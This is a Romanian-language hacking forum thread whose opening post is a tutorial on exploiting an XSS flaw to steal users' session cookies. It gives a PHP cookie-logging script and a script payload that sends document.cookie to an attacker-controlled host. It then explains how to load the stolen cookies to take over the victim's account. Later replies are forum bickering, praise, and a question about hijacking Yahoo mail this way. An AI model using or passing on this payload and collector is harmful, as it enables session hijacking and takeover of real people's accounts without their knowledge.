Cum sa exploatezi un xss dupa ce l-ai gasit

[crs12decoder]

Marea majoritate ce gasesc posturi ale altor useri de pe acest forum si nu numai, ce contin site-uri vulnerabile la xss, isi pun intrebarea cu ce ii ajuta si cum se extrag.

XSS-u este o vulnerabilitate ce permite extragerea cookie-urilor userului care viziteaza link-ul ce contine xss. In cazul in care userul este logat, cookie-ul detine informatiile sesiunii de logare, asta inseamna ca daca il furam si il inlocuim cu al nostru, putem accesa contul victimei fara sa-i stim credintialele.

Presupunem ca am gasit o vulnerabilitate xss pe un anumit site. In primul rand avem nevoie de un site sau un server spre care cookie-ul va fi trimis. Presupunem ca aveti www.site-ulmeu.com. Puneti pe server un fisier denumit grab.php ce contine urmatorul cod php:

<?php
$cookie = $HTTP_GET_VARS["cgrab"];
$fh = fopen('cookies.txt', 'a');
fwrite($fh, $cookie . "\n\n");
?>  

Uneori anumite servere nu permit crearea fisierului cookies.txt in cazul in care acesta nu exista, asa ca e bine sa-l creati voi, creati un fisier denumit "cookies.txt" si aveti grija ca acesta sa aiba drepturi de read si write.

Dupa cum ati vazut, xss-urile care sunt postate in general sunt de forma <script>alert('xss')</script>. Asta doar demonstreaza ca site-ul este vulnerabil la xss. Scriptul pe care voi trebuie sa-l folositi este acesta:

<script>document.location="http://www.site-ulmeu.com/grab.php?cgrab=" + document.cookie;</script>

trimiteti link-ul cu xss-ul unui anumit user(care voi credeti ca este logat) iar cookie-ul va fi salvat in http://www.site-ulmeu.com/cookies.txt

trebuie doar sa le luati si sa le adaugati in folderul cookies de la internet explorer sau sa le inlocuiti cu cele actuale. Astfel veti fi logat cu sesiunea victimei si veti avea drepturi depline asupra contului sau.

[CODEX]

nub mai sunt tutoriale din asta cu gramada si aici pe forum dar alora ce te-o intrebat le-o fo greu sa dea un serch

oricum bun a fi si asta..cand cauta l-a gasii mai rpd

si inca ceva da zi sincer l-ai scris tu sau copy paste

[crs12decoder]

1) nu sunt nub si te rog frumos sa nu te mai legi de mine. Daca ai ceva frumos de zis, zi daca nu, abtine-te si nu ma mai jignii.. deja m-am saturat cate rahaturi ai zis si eu am tacut. Eu nu m-am legat de tine in niciun fel si te rog sa faci si tu de asemenea. Nu oblig pe nimeni sa ma placa da nu-mi place sa fiu jignit ok?

2) e scris de mine cap-coada.. . Daca era copy-paste de undeva mentionam sursa. nu sunt genu care se lauda cu munca altuia. Personal nu ma intereseaza parerea lu' codex despre mine atata timp cat stiu ce e al meu.

Mi s-a parut ca majoritatea tutorialelor sunt explicate intr-un mod mai greoi si multi incepatori pun intrebari ori pentru ca nu cauta, ori pentru ca nu inteleg... atata tot.. ar trebui sa fie selectionat unu dintre tutoriale si sa fie postat undeva pe forum unde va fi mai vizibil pentru ca sunt sigur ca cel putin 60% din cei care se uita pe forum nu au idee cum se extrage un xss in concret

cand cauta l-a gasii mai rpd

cam asta era ideea

sper ca de acum vei inceta cu jignirile.

[s33us00n]

mie imi place cum l-ai scris:)...as vrea sa te intreb niste chestii....poti sa-mi lasi si mie id-ul tau de yahoo messenger te rog, sau sa mi-l trimiti intr-un PM? multumesc anticipat!

[Nytro]

mie imi place cum l-ai scris:)...as vrea sa te intreb niste chestii....poti sa-mi lasi si mie id-ul tau de yahoo messenger te rog, sau sa mi-l trimiti intr-un PM? multumesc anticipat!

Nu poti sa trimiti un PM in care sa ii ceri ID-ul? Nu mai faceti posturi in care cereti ID...

[black_death_c4t]

Nu poti sa trimiti un PM in care sa ii ceri ID-ul? Nu mai faceti posturi in care cereti ID...

Arata-mi butonu daca tot zici de pm . Mi-o tai daca gasesc asa ceva la mine.

[Guest Nemessis]

[MrRip]

offtopic : Nemessis ... mie unu nu imi apare . Care ar putea fi cauza ?

[Flubber]

Tutorialul este nemaipomenit, acum am inteles faza cu XSS-ul.

Apropo, te respect si mersi!

[Kestor]

@neme & RipKid: Probabil merge numai pentru moderatori/admini.

@black: Treci pe default theme si trimiti private-uri normal de acolo.

[toxic92]

cookie stealear merge doar cu xss de yahoo sau pot folosi si alte xss-uri de la alte site-uri pentru a accesa mailul de yahoo?

[black_death_c4t]

xss intr-un subdomeniu yahu doar